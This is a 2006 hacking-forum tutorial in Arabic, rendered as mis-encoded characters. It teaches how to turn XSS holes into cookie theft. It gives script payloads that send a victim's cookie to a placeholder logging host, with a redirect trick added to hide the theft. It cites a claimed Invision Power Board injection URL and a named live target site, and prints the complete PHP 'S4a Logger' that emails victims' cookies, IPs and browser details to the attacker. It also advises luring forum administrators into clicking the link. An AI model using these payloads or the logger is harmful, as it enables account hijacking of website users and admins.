ÔÑÍ ãÈÓØ :ÇÓÊÛáÇá ÇÛáÈíå ËÛÑÇÊ xss (ÏÑÓ ãåã) + ÊØÈíÞ - hacking collection

Members Login

Post Info

TOPIC: ÔÑÍ ãÈÓØ :ÇÓÊÛáÇá ÇÛáÈíå ËÛÑÇÊ xss (ÏÑÓ ãåã) + ÊØÈíÞ

so9or

ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline

Posts: 632

Date: Fri Nov 3 20:23:40 2006

ÔÑÍ ãÈÓØ :ÇÓÊÛáÇá ÇÛáÈíå ËÛÑÇÊ xss (ÏÑÓ ãåã) + ÊØÈíÞ	Permalink

ÇáÓáÇã Úáíßã æÑÍãå Çááå æÈÑßÇÊå ,, ÇáÇä åÐÇ Çæá ÏÑÓ áí ÈåÐÇ ÇáÞÓã ãä äÇÍíÉ Çááí ÈÊÝíÏßã ãÓÊÞÈáÇ æåæ íÊßáã Úä ßíÝíå ÇÓÊÛáÇá ËÛÑÇÊ xss ØíÈ äÃÊí ÇáÇä Çáì ÇáßæÏ Çáãåã Ýí ËÛÑÇÊ xss åÐÇ ßæÏ ÓßÑÈÊ ÎÈíË íÃÊí ÈãÚáæãÇÊ ÇáßæßíÒ ÊÌÏå ÏÇÆãÇ ð Ýí ËÛÑÇÊ xss ßæÏ PHP: <Script>javascript:alert(******.**)</Script> ÇáÃä ÇáßæÏ åÐÇ áã íßæä ÈÇáËÛÑå ÓæÝ íÙåÑ áß ÇáßæßíÒ ÊÈÚß æåæ íÍÊæí Úáì äÞÇØ ãåãå æåí : 1- ÑÞã ÇáÚÖæíå 2- ÇáÈÇÓæÑÏ ãÔÝÑ md5 3 - ÇáÈÇÓæÑÏ ãÔÝÑ Hash æÑÞã ÇáÇÓÊÇíá Çááí íÓÊÎÏãå æÛíÑå ,, Úáì ÍÓÈ äæÚíå ÇáÈÑäÇãÌ ÇáãÕÇÈ !! ØíÈ ÇáÍíä æÌÏÊ åÐÇ ÇáßæÏ ÓæÝ äÑÈØå ÈÇááæÌ ãÇåæ ÇááæÌ ¿ ÇááæÌ åÐÇ ÊÑÈØå ãÚ ÇáÓßÑÈÊ ÇáÐí íÇÊí ÈÇáßæßíÒ ,, æÈÚÏ Çä ÊÑÈØå ßá ãä ÝÊÍ ÇáÓßÑÈÊ æåæ ãÑÈæØ ÈÇááæÌ ÓæÝ íÓÌá ãÚáæãÇÊ ÇáßæßíÒ ÊÈÚå ÈÇááæÌ Çæ íÑÓá Çáì Çíãíáß ( Úáì ÍÓÈ ÇááæÌ ) ØíÈ ÇáÇä ÈÚÏ ãÇ ÑÈØÊå ÇÕÈÍ ÇáÑÇÈØ : ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?id="+****.**</Script> ÊãÇã ÇáÇä : www.xxx.com = ÇáãæÞÚ ÇáãÑÈæØ Ýíå ÇááæÌ log.php = ÇÓã ãáÝ ÇááæÌ ØíÈ ÇáÍíä äÑÝÚ ÇááæÌ Úáì Çí ãæÞÚ ÚäÏß æÈÚÏ ßÐÇ ÊÓÊÈÏá www.xxx.com/log.php ÈÑÇÈØ ÇááæÌ Çáí ÚäÏß Çáãåã ÇáÇä åÐÇ ÇáÓßÑÈÊ ÇÕÈÍ ÌÇåÒÇ ááÇÓÊÚãÇá ÓæÝ äÖÚå ÈßæÏ ÇáËÛÑå æäÓÊÈÏá : ßæÏ PHP: <Script>javascript:alert(****.**)</Script> ÈÜ ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?id="+****.**</Script> ÇáÇä äÎáí ãËáÇ ÇáãÏíÑ ÇáÚÇã Çæ Çí ÚÖæ ÊÈí ÊÓÑÞ ÇáßæßíÒ ÊÈÚå Çäå íÝÊÍ ÇáÑÇÈØ ÈÊÞæá ßíÝ ÈÞæáß íÇÇÇæáÏ ÇäÊ æÑÇÇÇÇÇÓß(6) ÚÇÏ ÈØÑíÞÊß Îáíå íÝÊÍ ÇáÑÇÈØ ØíÈ ÇáÍíä ÈÊÞæáí æÇááå ÝÖíÍå íÇÈæ ÎÇáÏ áã ÇÎáíå íÝÊÍ ÇáÑÇÈØ íØáÚ ÚäÏå ÇááæÌ æÈíßÔÝäí ÈÞæáå æáÇ íåãß ÇÎæí äÑÈØå ßãÇä ÈãæÞÚ ááÊãæíå ãËáÇ äÑÈØå ÈãæÞÚ www.google.com ÈÍíË Çäå áã íÝÊÍ ÇáËÛÑå æÇáãÑÈæØ ÝíåÇ ÇááæÌ æãæÞÚ ÌæÌá ÑÇÍ íÊÍæá ÇæÊæãÇÊíß Çáì ÌæÌá æÈßÐÇ ãÇíÔß ÈÊÞæá ßíÝ íÇÈæ ÎÇáÏ ÈÞæáß ßÐÇ äÖÚ ÈÚÏ ÑÇÈØ ÇááæÌ : re=www.google.com& ÈÓ ÈÍíË íßæä ÈÚÏ & íæÌÏ id ... ÇáÎ íÚäí íßæä ÇáßæÏ : ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****.**</Script> ØÈÚÇ ÇäÊ ÇÓÊÈÏá www.google.com ÈÇí ãæÞÚ ÊÈÛÇå æíÝÖá íßæä ÇáãæÞÚ Çáí ãÕÇÈ Ýíå ÇáËÛÑå (1) ØíÈ ÇáÍíä ÊÞæá ßÐÇ ÊãÇã íÇÈæ ÎÇáÏ íÇááå ÚØäÇ ãËÇÇÇá ÈÚØíßã ãËÇá áËÛÑå Çáí ÇßÊÔÝÊåÇ ÇäÇ ÈãäÊÏíÇÊ :Invision Power Board ÇáßæÏ ááËÛÑå : http://xxx.com/forums/index.php?act=idx='><script>alert(****.**)</script> ÇÍäÇ ÑÇÍ äÓÊÈÏá : ßæÏ PHP: <Script>javascript:alert(****.**)</Script> ÈÜ ßæÏ PHP: <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+****.**</Script> æÇÓÊÈÏá åäÇ ãæÞÚ ÌæÌá ÈÇí ãæÞÚ ÊÈÛÇå æÑÇÈØ ÇááæÌ www.xxx.com/log.php ÈÇááæÌ ÊÈÚß ==================== ÊØÈíÞ : ÇáÊØÈíÞ åäÇ : ßæÏ PHP: http://www.mahrum.com/forums/index.php?act=idx='><script>alert(****.**)</script> =================== ÇááæÌ : ßæÏ PHP: <?php // Thnx For Security 4 Arab - http://www.s4a.cc - http://www.s4a.com/forum //----- S4a Logger v0.10 -----// // Star //Your Email --::-- $ToGet = "Linux_Drox@hotmail.com"; //////////////////////////////// $Ip = $REMOTE_ADDR; $Sys = $HTTP_USER_AGENT; ////////////////////////////////////////////// if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} // $Time = date("l dS of F Y h:i:s A"); $Hdr = 'From: Logger <logger@secourty>'; $Msg = ' Hi ,, Mr.Attacker :D ------------------------------------------- - Thnx For S4a ,, Security For Arab Forum - - s4a - - s4a froum - --------------------------------------------------------------------- - This Script Coded By Devil-00 [ Devil From Palestine ] - - <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> - --------------------------------------------------------------------- - IP ::- [ ' .$Ip.' ] - System ::- [ '.$Sys.' ] - The ** ::- [ '.$id.' ] - Time ::- [ '.$Time.' ] --------------------------------------------------------------------- - root@devil00 ~ ./evilcat /etc/passwd - - root@devil00 ~ ./s4acracker passwd --log <log.log> && - --------------------------------------------------------------------- '; $send = mail($ToGet,'S4a - [ New**** ]',$Msg,$Hdr); // /* ******* code ,, By Devil-00 [ 25/5/2005 ] << v0.10 / if(isset($_GET["re"])){ $**** = $_GET["re"]; if($*** == ""){ mail ($ToGet,'S4a - [Error]','*** Is Set And Its Empty !!',$Hdr); }else{ header("location:".$****); } } // ?> ÇÓÊÈÏá åäÇ : ßæÏ PHP: $ToGet = "Linux_Drox@hotmail.com"; ÇáÇíãíá: Linux_Drox@hotmail.com ÈÇáÇíãíá ÊÈÚß ! æÇÍÝÙå ÈÇãÊÏÇÏ php ØÈÚÇ ÇÝÊÍ ÇáãÝßÑå æÍØ ÇáßæÏ æáÇÊäÓì ÊÛíÑ ÇáÇíãíá æÇÍÝÙå ÈÇãÊÏÇÏ php æÇÑÝÚå Úáì ãæÞÚß Çæ Úáì ãæÞÚ áÇíßæÓ æÃÎÕ ÈÇáÔßÑ åäÇ áÃÎæí ÇáÚÒíÒ Devil-00 áÈÑãÌÊå åÐÇ ÇááæÌ ÇáããÊÇÒ ÕÑÇÍå ================ ãáÇÍÙå : ÇäÇ áã ÇÖÚ ÇáÊØÈíÞ ÇáÇ áÇäå ÏÑÓ Úãáí ÝÞØ áÇ ÃßËÑ .. æÈÅãßÇäß ÇÓÊÛáÇáå ÈËÛÑå xss ÊÈÚ cPanel æáÇßäåÇ ÇÕÈÍÊ ÞÏíãå æÑÞÚÊ ÇíÖÇ Úáì ÌãíÚ ÇáãæÇÞÚ æáÇßä áíÓ åÐå ÇáËÛÑå æÍÓÈ Èá Ýíå ßËíÜÜÑ æßËíÑ ãä ÇáËÛÑÇÊ xss ãáíÇäå ÈãæÇÞÚ ÇáÓíßæÑÊí æÛíÑåÇ ãä ËÛÑÇÊ xss æÊÇÈÚæ ÞÓã ÇáßÊÈ áÇäí ÓæÝ ÇÖÚ ßÊÇÈ ÔíÞ Úä xss æÝíå ÔÝÑÇÊ ÇáÜ hex ÇáÊí ÊÓÊÎÏã ÏÇÆãÇ Ýí ÇáÓßÑÈÊÇÊ ÇáÎÈíËå æåí ÇáÊí ÊØÈÞ Úä ØÑíÞ ÇáãÊÕÝÍ! ÃåÏí ÇáÏÑÓ áÚÒíÒí ÒãÇäí ( ÚÐÇÈí ÛíÑ ) ===================== ÌãíÚ ÇáÍÞæÞ ãÍÝæÙå : Linux_Drox 8/7/2005 ã __________________

Page 1 of 1 sorted by

Add/remove tags to this thread

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse